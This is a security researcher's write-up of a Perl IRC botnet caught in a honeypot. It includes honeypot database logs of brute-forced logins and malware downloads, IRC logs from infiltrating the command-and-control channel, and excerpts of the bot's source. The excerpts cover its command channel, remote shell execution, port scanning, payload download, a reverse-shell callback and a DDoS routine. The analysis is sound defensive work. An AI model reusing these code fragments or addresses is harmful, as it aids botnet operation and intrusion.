|
|
Analysis Tech Art Repositories | |||||||
Sun Sep 4 00:03:59 2022
(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there's a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)
https://bcable.net/analysis-ukr-prelim.html
https://bcable.net/analysis-ukr-graphs.html
https://bcable.net/analysis-ukr-indicators.html
https://bcable.net/analysis-ukr-ru_map_sessions.html
https://bcable.net/analysis-ukr-cn_map_sessions.html
https://bcable.net/analysis-ukr-miori_fail.html
https://bcable.net/analysis-ukr-botnet_perl.html
https://bcable.net/analysis-ukr-ddos_gh0st.html
https://bcable.net/analysis-ukr-indicators_2023.html
https://bcable.net/analysis-ukr-crew_001.html
https://bcable.net/analysis-ukr-inventory_attack.html
https://bcable.net/analysis-ukr-crew_002.html
https://github.com/la5la/ircbot
Cornel
sqlite> select * from downloads as d join sessions as s on d.session = s.id join auth as a on s.id = a.session where outfile like '%fe1ea7c44589c8a44e0019a4eab2c4d006321c03f457a2356896f2a2752f8360%';
id|session|timestamp|url|outfile|shasum|id|starttime|endtime|sensor|ip|termsize|client|id|session|success|username|password|timestamp
216|fc98f272a2dc|2022-04-23T07:48:34.614937Z|http://5.161.51.216/bot|var/lib/cowrie/downloads/fe1ea7c44589c8a44e0019a4eab2c4d006321c03f457a2356896f2a2752f8360|fe1ea7c44589c8a44e0019a4eab2c4d006321c03f457a2356896f2a2752f8360|fc98f272a2dc|2022-04-23T07:48:31.501766Z|2022-04-23T07:48:35.273251Z|1|118.69.226.254||8|58736|fc98f272a2dc|1|root|123456|2022-04-23T07:48:33.196773Z
217|38ddedb14568|2022-04-23T07:49:13.179321Z|http://5.161.51.216/bot|var/lib/cowrie/downloads/fe1ea7c44589c8a44e0019a4eab2c4d006321c03f457a2356896f2a2752f8360|fe1ea7c44589c8a44e0019a4eab2c4d006321c03f457a2356896f2a2752f8360|38ddedb14568|2022-04-23T07:49:10.371314Z|2022-04-23T07:49:13.815369Z|1|118.69.226.254||8|58740|38ddedb14568|1|root|password|2022-04-23T07:49:12.065584Z
sqlite> select * from downloads as d join sessions as s on d.session = s.id join auth as a on s.id = a.session where outfile like '%3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f%';
id|session|timestamp|url|outfile|shasum|id|starttime|endtime|sensor|ip|termsize|client|id|session|success|username|password|timestamp
82|709158202a64|2022-04-17T09:26:26.649849Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|709158202a64|2022-04-17T09:26:26.032408Z|2022-04-17T09:26:26.868982Z|1|207.154.206.214||8|6107|709158202a64|1|root|root|2022-04-17T09:26:26.327921Z
83|709158202a64|2022-04-17T09:26:26.769100Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|709158202a64|2022-04-17T09:26:26.032408Z|2022-04-17T09:26:26.868982Z|1|207.154.206.214||8|6107|709158202a64|1|root|root|2022-04-17T09:26:26.327921Z
84|bfca2fa409ee|2022-04-17T09:26:41.551852Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|bfca2fa409ee|2022-04-17T09:26:41.011979Z|2022-04-17T09:26:41.732638Z|1|207.154.206.214||8|6109|bfca2fa409ee|1|root|123456|2022-04-17T09:26:41.299276Z
85|bfca2fa409ee|2022-04-17T09:26:41.682488Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|bfca2fa409ee|2022-04-17T09:26:41.011979Z|2022-04-17T09:26:41.732638Z|1|207.154.206.214||8|6109|bfca2fa409ee|1|root|123456|2022-04-17T09:26:41.299276Z
86|b3df2ef4051f|2022-04-17T09:28:55.595543Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|b3df2ef4051f|2022-04-17T09:28:54.999198Z|2022-04-17T09:28:55.803533Z|1|207.154.206.214||8|6121|b3df2ef4051f|1|root|12345|2022-04-17T09:28:55.283035Z
87|b3df2ef4051f|2022-04-17T09:28:55.714617Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|b3df2ef4051f|2022-04-17T09:28:54.999198Z|2022-04-17T09:28:55.803533Z|1|207.154.206.214||8|6121|b3df2ef4051f|1|root|12345|2022-04-17T09:28:55.283035Z
88|d6264f8d4e96|2022-04-17T09:31:22.610624Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|d6264f8d4e96|2022-04-17T09:31:22.016541Z|2022-04-17T09:31:22.785848Z|1|207.154.206.214||8|6135|d6264f8d4e96|1|test|test|2022-04-17T09:31:22.298148Z
89|d6264f8d4e96|2022-04-17T09:31:22.724455Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|d6264f8d4e96|2022-04-17T09:31:22.016541Z|2022-04-17T09:31:22.785848Z|1|207.154.206.214||8|6135|d6264f8d4e96|1|test|test|2022-04-17T09:31:22.298148Z
90|a975b8c6dbdf|2022-04-17T09:34:39.913724Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|a975b8c6dbdf|2022-04-17T09:34:39.363080Z|2022-04-17T09:34:40.105843Z|1|207.154.206.214||8|6153|a975b8c6dbdf|1|oracle|oracle|2022-04-17T09:34:39.650536Z
91|a975b8c6dbdf|2022-04-17T09:34:40.037981Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|a975b8c6dbdf|2022-04-17T09:34:39.363080Z|2022-04-17T09:34:40.105843Z|1|207.154.206.214||8|6153|a975b8c6dbdf|1|oracle|oracle|2022-04-17T09:34:39.650536Z
92|27af2a52e5c7|2022-04-17T09:35:25.310444Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|27af2a52e5c7|2022-04-17T09:35:24.699219Z|2022-04-17T09:35:25.498376Z|1|207.154.206.214||8|6157|27af2a52e5c7|1|user|1|2022-04-17T09:35:24.992700Z
93|27af2a52e5c7|2022-04-17T09:35:25.428745Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|27af2a52e5c7|2022-04-17T09:35:24.699219Z|2022-04-17T09:35:25.498376Z|1|207.154.206.214||8|6157|27af2a52e5c7|1|user|1|2022-04-17T09:35:24.992700Z
94|a1384b4494df|2022-04-17T09:35:40.353391Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|a1384b4494df|2022-04-17T09:35:39.791925Z|2022-04-17T09:35:40.528939Z|1|207.154.206.214||8|6158|a1384b4494df|1|user|user|2022-04-17T09:35:40.070481Z
95|a1384b4494df|2022-04-17T09:35:40.468381Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|a1384b4494df|2022-04-17T09:35:39.791925Z|2022-04-17T09:35:40.528939Z|1|207.154.206.214||8|6158|a1384b4494df|1|user|user|2022-04-17T09:35:40.070481Z
96|959ce67fa45b|2022-04-17T09:38:40.892032Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|959ce67fa45b|2022-04-17T09:38:40.357846Z|2022-04-17T09:38:41.067231Z|1|207.154.206.214||8|6174|959ce67fa45b|1|admin|admin|2022-04-17T09:38:40.644736Z
97|959ce67fa45b|2022-04-17T09:38:41.007724Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|959ce67fa45b|2022-04-17T09:38:40.357846Z|2022-04-17T09:38:41.067231Z|1|207.154.206.214||8|6174|959ce67fa45b|1|admin|admin|2022-04-17T09:38:40.644736Z
98|7832317f69f4|2022-04-17T09:42:57.605467Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|7832317f69f4|2022-04-17T09:42:57.005267Z|2022-04-17T09:42:57.784940Z|1|207.154.206.214||8|6196|7832317f69f4|1|admin|password|2022-04-17T09:42:57.290429Z
99|7832317f69f4|2022-04-17T09:42:57.720300Z|http://164.92.142.65/irc.pl|var/lib/cowrie/downloads/3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|3e81750806950bdb1559ef90df2954c8e89bf802e9be5d290f9657742cd7759f|7832317f69f4|2022-04-17T09:42:57.005267Z|2022-04-17T09:42:57.784940Z|1|207.154.206.214||8|6196|7832317f69f4|1|admin|password|2022-04-17T09:42:57.290429Z
sqlite> select * from downloads as d join sessions as s on d.session = s.id join auth as a on s.id = a.session where outfile like '%60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870%';
3572|c9f7e770506a|2022-04-04T00:35:33.878418Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|c9f7e770506a|2022-04-04T00:35:33.058704Z|2022-04-04T00:35:34.100129Z|1|206.81.22.139||3|322167|c9f7e770506a|1|root|123456|2022-04-04T00:35:33.497340Z
3573|c9f7e770506a|2022-04-04T00:35:34.018685Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|c9f7e770506a|2022-04-04T00:35:33.058704Z|2022-04-04T00:35:34.100129Z|1|206.81.22.139||3|322167|c9f7e770506a|1|root|123456|2022-04-04T00:35:33.497340Z
3574|105a5b5a7afc|2022-04-04T00:35:59.648121Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|105a5b5a7afc|2022-04-04T00:35:58.856399Z|2022-04-04T00:35:59.990879Z|1|206.81.22.139||3|322168|105a5b5a7afc|1|root|root|2022-04-04T00:35:59.359171Z
3575|105a5b5a7afc|2022-04-04T00:35:59.793432Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|105a5b5a7afc|2022-04-04T00:35:58.856399Z|2022-04-04T00:35:59.990879Z|1|206.81.22.139||3|322168|105a5b5a7afc|1|root|root|2022-04-04T00:35:59.359171Z
3576|4232e6b9171c|2022-04-04T00:38:25.221016Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|4232e6b9171c|2022-04-04T00:38:24.458975Z|2022-04-04T00:38:25.406595Z|1|206.81.22.139||3|322177|4232e6b9171c|1|root|12345|2022-04-04T00:38:24.857699Z
3577|4232e6b9171c|2022-04-04T00:38:25.361553Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|4232e6b9171c|2022-04-04T00:38:24.458975Z|2022-04-04T00:38:25.406595Z|1|206.81.22.139||3|322177|4232e6b9171c|1|root|12345|2022-04-04T00:38:24.857699Z
3578|15da0aebc427|2022-04-04T00:48:43.326744Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|15da0aebc427|2022-04-04T00:48:42.658201Z|2022-04-04T00:48:43.598012Z|1|206.81.22.139||3|322215|15da0aebc427|1|test|test|2022-04-04T00:48:42.995468Z
3579|15da0aebc427|2022-04-04T00:48:43.465683Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|15da0aebc427|2022-04-04T00:48:42.658201Z|2022-04-04T00:48:43.598012Z|1|206.81.22.139||3|322215|15da0aebc427|1|test|test|2022-04-04T00:48:42.995468Z
3580|63e5ab8bc2bc|2022-04-04T00:52:36.376526Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|63e5ab8bc2bc|2022-04-04T00:52:35.659742Z|2022-04-04T00:52:36.573872Z|1|206.81.22.139||3|322229|63e5ab8bc2bc|1|admin|admin|2022-04-04T00:52:35.998587Z
3581|63e5ab8bc2bc|2022-04-04T00:52:36.523943Z|http://104.248.171.242/bot.pl|var/lib/cowrie/downloads/60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|60b2a3a0113878d2955684c3066777e7d538900c5169802bced318204e34e870|63e5ab8bc2bc|2022-04-04T00:52:35.659742Z|2022-04-04T00:52:36.573872Z|1|206.81.22.139||3|322229|63e5ab8bc2bc|1|admin|admin|2022-04-04T00:52:35.998587Z
Raw malware scripts at bottom.
inetnum: 5.161.0.0 - 5.161.255.255
netname: DE-HETZNER-20120725
country: US
org: ORG-HOA1-RIPE
admin-c: HOAC1-RIPE
tech-c: HOAC1-RIPE
status: ALLOCATED PA
mnt-by: HOS-GUN
mnt-by: RIPE-NCC-HM-MNT
created: 2019-02-01T09:21:30Z
last-modified: 2021-04-28T08:30:13Z
source: RIPE
organisation: ORG-HOA1-RIPE
org-name: Hetzner Online GmbH
country: DE
org-type: LIR
address: Industriestrasse 25
address: D-91710
address: Gunzenhausen
address: GERMANY
phone: +49 9831 5050
fax-no: +49 9831 5053
admin-c: TF2013-RIPE
admin-c: MF1400-RIPE
admin-c: GM834-RIPE
admin-c: HOAC1-RIPE
admin-c: MH375-RIPE
admin-c: SK2374-RIPE
admin-c: SK8441-RIPE
abuse-c: HOAC1-RIPE
mnt-ref: RIPE-NCC-HM-MNT
mnt-ref: HOS-GUN
mnt-by: RIPE-NCC-HM-MNT
mnt-by: HOS-GUN
created: 2004-04-17T11:07:58Z
last-modified: 2020-12-16T13:13:06Z
source: RIPE # Filtered
The username generation is pretty easy to decipher, so I jumped in as a pretend bot pretty easily:
$servidor='5.161.51.216' unless $servidor;
my $porta='6667';
my $nick = getnick();
my $ircname = getnick();
my $realname = getnick();
sub getnick {
#my $retornonick = &_get("http://websurvey.burstmedia.com/names.txt");
#return $retornonick;
return "mfu".int(rand(9000));
}
/connect 5.161.51.216 6667
13:16 -!- ___ _
13:16 -!- |_ _|_ _ _____(_)
13:16 -!- | || '_(_-<_-< |
13:16 -!- |___|_| /__/__/_|
13:16 -!- Irssi v1.1.1 - http://www.irssi.org
13:16 -!- Irssi: Looking up 5.161.51.216
13:16 -!- Irssi: Connecting to 5.161.51.216 [5.161.51.216] port 6667
13:16 -!- Irssi: Connection to 5.161.51.216 established
13:16 !irc.Cornel.org *** Looking up your hostname...
13:16 !irc.Cornel.org *** Couldn't resolve your hostname; using your IP address
instead
13:16 -!- Welcome to the Cornel IRC Network mfu7454!mfu1243@##bcable-redacted##
13:16 -!- Your host is irc.Cornel.org, running version UnrealIRCd-5.2.3
13:16 -!- This server was created Fri Jan 28 2022 at 15:28:40 UTC
13:16 -!- irc.Cornel.org UnrealIRCd-5.2.3 iowrsxzdHtIDZRqpWGTSB
lvhopsmntikraqbeIHzMQNRTOVKDdGLPZSCcf
13:16 -!- AWAYLEN=307 BOT=B CASEMAPPING=ascii CHANLIMIT=#:20
CHANMODES=beI,kLf,lH,psmntirzMQNRTOVKDdGPZSCc CHANNELLEN=32
CHANTYPES=# CHATHISTORY=50
CLIENTTAGDENY=*,-draft/typing,-typing,-draft/reply DEAF=d ELIST=MNUCT
EXCEPTS are supported by this server
13:16 -!- EXTBAN=~,GptmTSOcarnqjf INVEX KICKLEN=307 KNOCK MAP MAXCHANNELS=20
MAXLIST=b:60,e:60,I:60 MAXNICKLEN=30 MINNICKLEN=0 MODES=12 NAMESX
NETWORK=Cornel are supported by this server
13:16 -!- NICKLEN=30 PREFIX=(qaohv)~&@%+ QUITLEN=307 SAFELIST SILENCE=15
STATUSMSG=~&@%+
TARGMAX=DCCALLOW:,ISON:,JOIN:,KICK:4,KILL:,LIST:,NAMES:1,NOTICE:1,PART:,PRIVMSG:4,SAJOIN:,SAPART:,TAGMSG:1,USERHOST:,USERIP:,WATCH:,WHOIS:1,WHOWAS:1 TOPICLEN=360
UHNAMES USERIP WALLCHOPS WATCH=128 are supported by this server
13:16 -!- WATCHOPTS=A WHOX are supported by this server
13:16 -!- 8221B533.B270D8A1.36629018.IP is now your displayed host
13:16 -!- There are 3 users and 25 invisible on 1 servers
13:16 -!- 2 operator(s) online
13:16 -!- 1 unknown connection(s)
13:16 -!- 5 channels formed
13:16 -!- I have 28 clients and 0 servers
13:16 -!- 28 181 Current local users 28, max 181
13:16 -!- 28 181 Current global users 28, max 181
13:16 -!- MOTD File is missing
13:16 -!- Mode change [+iwx] for user mfu7454
13:18 -!- mfu7454 [mfu1243@##bcable-redacted##] has joined #bot
13:18 [Users #bot]
13:18 [@SuKy ] [ mfu1881] [ mfu4712] [ mfu6392] [ mfu7500] [ mfu8570]
13:18 [ Cornel ] [ mfu2271] [ mfu4818] [ mfu6449] [ mfu7581]
13:18 [ mfu1051] [ mfu4468] [ mfu5874] [ mfu6821] [ mfu7678]
13:18 [ mfu1329] [ mfu4597] [ mfu5903] [ mfu7454] [ mfu797 ]
13:18 -!- Irssi: #bot: Total of 21 nicks [1 ops, 0 halfops, 0 voices, 20 normal]
13:18 -!- Channel #bot created Fri Jan 28 09:37:00 2022
13:18 -!- Irssi: Join to #bot was synced in 0 secs
13:19 < Cornel> mfu7454 id
19:52 -!- mfu2271 [mfu5789@Clk-73ABA6B8.pool.telefonica.de] has quit [Ping
timeout: 180 seconds]
21:49 -!- mfu2271 [mfu5789@Clk-C7D628B4.pool.telefonica.de] has joined #bot
Day changed to 15 Apr 2022
03:41 -!- mfu6392 [mfu339@883252B9.A8F3B0D1.844BFFA3.IP] has quit [Ping timeout:
180 seconds]
13:20 -!- SuKy [Bazatul@Cornel.org]
13:20 -!- ircname : Un Nimeni Celebru
13:20 -!- channels : @#xyz @#SuKy @#opers @#lan @#bot
13:20 -!- server : irc.Cornel.org [Cornel Server]
13:20 -!- : IRC Operator
13:20 -!- : is a Network Administrator
13:20 -!- idle : 2 days 3 hours 28 mins 38 secs [signon: Tue Apr 12
09:54:10 2022]
13:20 -!- End of WHOIS
13:20 -!- Cornel [add@Cornel.org]
13:20 -!- ircname : 0
13:20 -!- channels : #bot #opers
13:20 -!- server : irc.Cornel.org [Cornel Server]
13:20 -!- : IRC Operator
13:20 -!- : is a Network Administrator
13:20 -!- idle : 0 days 0 hours 0 mins 49 secs [signon: Mon Apr 11 15:26:39
2022]
13:20 -!- End of WHOIS
13:23 You are on the following channels:
13:23 #bot +nt (5): mfu7500 mfu5874 mfu1881 mfu7454 mfu6821 mfu1051
mfu6449 mfu6392 mfu5903 mfu4597 mfu797 Cornel mfu4818 mfu7678
SuKy mfu2271 mfu4468 mfu8570 mfu1329 mfu4712 mfu7581
13:23 -!- Channel Users Name
13:23 -!- #bot 21 [+nt]
13:23 -!- #opers 2 [+nt]
13:23 -!- #SuKy 1 [+nt]
13:23 -!- #lan 1 [+nt]
13:23 -!- #xyz 8 [+nt]
13:23 -!- End of /LIST
So basically, when looking at this script it manually requires @adms which in this case, consists of “Cornel” exclusively, to run commands:
elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
my @canais=("#bot");
my @adms=("Cornel");
my @auth=("*!*@*");
So, “Cornel” in this instance wanted my fake bot connection to execute “id”, so that it could confirm commands could execute and also know what user the Perl script was executing as. My non-response should be received as a red-flag, but also could be received as a glitchy bot. We'll see how long squatting works here.
Another interesting point, with that auth string of *!*@* anyone who becomes the username Cornel can take over and control the server with no actual host security on the Perl script (which I admit, is difficult to send out a hostname for command and control and very easy to forge the other two anyway, so not really a huge advantage as you could easily lock yourself out of your botnet if you were doing this).
portscan
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
download
elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
getstore("$1", "$2");
fullportscan (provided port range)
elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {
my $hostname="$1";
my $portainicial = "$2";
my $portafinal = "$3";
my (@abertas, %porta_banner);
foreach my $porta ($portainicial..$portafinal)
udp
UDP socket opening for raw connections.
elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
udpfaixa
More UDP socket connections.
elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {
conback
Seems to be a full TCP shell callback for UNIX and Windows.
# Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
oldpack
This appears to be a full IGMP, ICMP, UDP, and TCP DDoS platform.
elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {
There also is code for IRC DCC send/recv. What did I say during Log4j botnets about disabling CTCP? While that doesn't block DCC (you have to accept DCC individually anyway), you have to be careful with features like those that leak information about yourself. While I'm typing this I'm sitting in the botnet still, so with CTCPs off, they could be attempting to probe me beyond /whois and knowing my IP since they are admins. I'm behind a VPN so they aren't going to figure out who I am (even though I'm about to publish my full identity, but in the moment it matters more… I won't publish any of this until after I get found out or something interesting happens or I get bored and move on).
The interesting thing is that they have some various detection code for basically verifying the bot:
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001gtfo\001");
}
elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
notice("$pn", "\001BONG\001");
The fact that I'm not receiving any of these messages makes me wonder if the operators of this botnet actually are the developers of this code (or are capable of reading Perl).
To reverse engineer the nick is fairly easy. Even these messages are, well, easy enough. The regular expressions a bit strange given they are wrapped with “\001” but I can even probably pretend to be a bot at this point with no messages having been sent to me to pretend. Even though I've deciphered the general messaging, I just don't think they'd know it anyway. Even so, these operators have waited so long that I think it's probably best at this point to continue to play dead.
So now just to await further instruction from Mr. Cornel himself. Or watch his commands to others.
Since I was really curious what was in #xyz, I eventually joined:
14:23 -!- Channel Users Name
14:23 -!- #bot 3 [+nt]
14:23 -!- #xyz 4 [+nt]
14:23 -!- End of /LIST
14:23 -!- Cornel [add@Cornel.org]
14:23 -!- was : 0
14:23 -!- server : irc.Cornel.org [Sun May 22 09:49:50 2022]
14:23 -!- End of WHOWAS
/j #xyz
--- Log opened Mon May 30 14:23:48 2022
14:23 -!- mfu7454 [mfu1243@##bcable-redacted##] has joined #xyz
14:23 [Users #xyz]
14:23 [ dark1821] [ dark4609] [ dark5090] [ dark6855] [ mfu7454]
14:23 -!- Irssi: #xyz: Total of 5 nicks [0 ops, 0 halfops, 0 voices, 5 normal]
14:23 -!- Channel #xyz created Thu Mar 17 11:43:25 2022
14:23 -!- Irssi: Join to #xyz was synced in 1 secs
14:24 -!- mfu7454 [mfu1243@##bcable-redacted##] has left #xyz []
--- Log closed Mon May 30 14:24:37 2022
14:23 -!- dark4609 [dark507@Clk-16A21240.in-addr.btopenworld.com]
14:23 -!- ircname : dark6441
14:23 -!- channels : #xyz
14:23 -!- server : irc.Cornel.org [Cornel Server]
14:23 -!- idle : 9 days 17 hours 20 mins 32 secs [signon: Fri May 20 21:03:26 2022]
14:23 -!- End of WHOIS
14:24 -!- dark5090 [dark2899@6E024D62.9D096B3C.89993606.IP]
14:24 -!- ircname : dark5702
14:24 -!- channels : #xyz
14:24 -!- server : irc.Cornel.org [Cornel Server]
14:24 -!- idle : 49 days 0 hours 15 mins 35 secs [signon: Mon Apr 11 14:08:26 2022]
14:24 -!- End of WHOIS
14:24 -!- dark6855 [dark7956@Clk-82B8126E.pool.telefonica.de]
14:24 -!- ircname : dark3592
14:24 -!- channels : #xyz
14:24 -!- server : irc.Cornel.org [Cornel Server]
14:24 -!- idle : 0 days 16 hours 39 mins 52 secs [signon: Sun May 29 21:44:23 2022]
14:24 -!- End of WHOIS
14:24 -!- dark1821 [dark1937@Clk-227823C5.fixed.kpn.net]
14:24 -!- ircname : dark6892
14:24 -!- channels : #xyz
14:24 -!- server : irc.Cornel.org [Cornel Server]
14:24 -!- idle : 66 days 6 hours 27 mins 5 secs [signon: Tue Mar 22 23:46:45 2022]
14:24 -!- End of WHOIS
Looks like there's a variant of this script that uses “dark” as the prefix for the users instead of “mfu”, and “#xyz” instead of “#bot”. This does, however, use the same server. I guess they probably moved onto another C2C server as Cornel and SuKy seem to have abandoned this one. Given 66 days and 49 days, I think the other Linode mfu user is a person to be honest.
Not really a whole lot happened. A few id commands, some uname -a, standard diagnostics…
13:18 [Users #bot]
13:18 [@SuKy ] [ mfu1881] [ mfu4712] [ mfu6392] [ mfu7500] [ mfu8570]
13:18 [ Cornel ] [ mfu2271] [ mfu4818] [ mfu6449] [ mfu7581]
13:18 [ mfu1051] [ mfu4468] [ mfu5874] [ mfu6821] [ mfu7678]
13:18 [ mfu1329] [ mfu4597] [ mfu5903] [ mfu7454] [ mfu797 ]
13:18 -!- Irssi: #bot: Total of 21 nicks [1 ops, 0 halfops, 0 voices, 20 normal]
13:18 -!- Channel #bot created Fri Jan 28 09:37:00 2022
13:18 -!- Irssi: Join to #bot was synced in 0 secs
13:19 < Cornel> mfu7454 id
19:52 -!- mfu2271 [mfu5789@Clk-73ABA6B8.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
21:49 -!- mfu2271 [mfu5789@Clk-C7D628B4.pool.telefonica.de] has joined #bot
--- Day changed Fri Apr 15 2022
03:41 -!- mfu6392 [mfu339@883252B9.A8F3B0D1.844BFFA3.IP] has quit [Ping timeout: 180 seconds]
12:21 -!- mfu4712 [mfu2492@li2152-35.members.linode.com] has quit [Read error]
12:22 -!- mfu4712 [mfu2492@139.224.15.6] has joined #bot
12:40 -!- mfu4712 [mfu2492@139.224.15.6] has quit [Ping timeout: 180 seconds]
12:40 -!- mfu4712 [mfu2492@li1700-46.members.linode.com] has joined #bot
14:56 < Cornel> mfu4712 id
17:14 -!- mfu7581 [mfu4864@ADE91361.1404C17B.785B0A34.IP] has quit [Ping timeout: 180 seconds]
17:14 -!- mfu6449 [mfu5855@ADE91361.1404C17B.785B0A34.IP] has quit [Ping timeout: 180 seconds]
17:18 -!- mfu7581 [mfu4864@ADE91361.1404C17B.785B0A34.IP] has joined #bot
17:18 -!- mfu6449 [mfu5855@ADE91361.1404C17B.785B0A34.IP] has joined #bot
19:51 -!- mfu2271 [mfu5789@Clk-C7D628B4.pool.telefonica.de] has quit [Ping timeout: 180 seconds]
21:48 -!- mfu2271 [mfu5789@Clk-7B42562B.pool.telefonica.de] has joined #bot
--- Day changed Sat Apr 16 2022
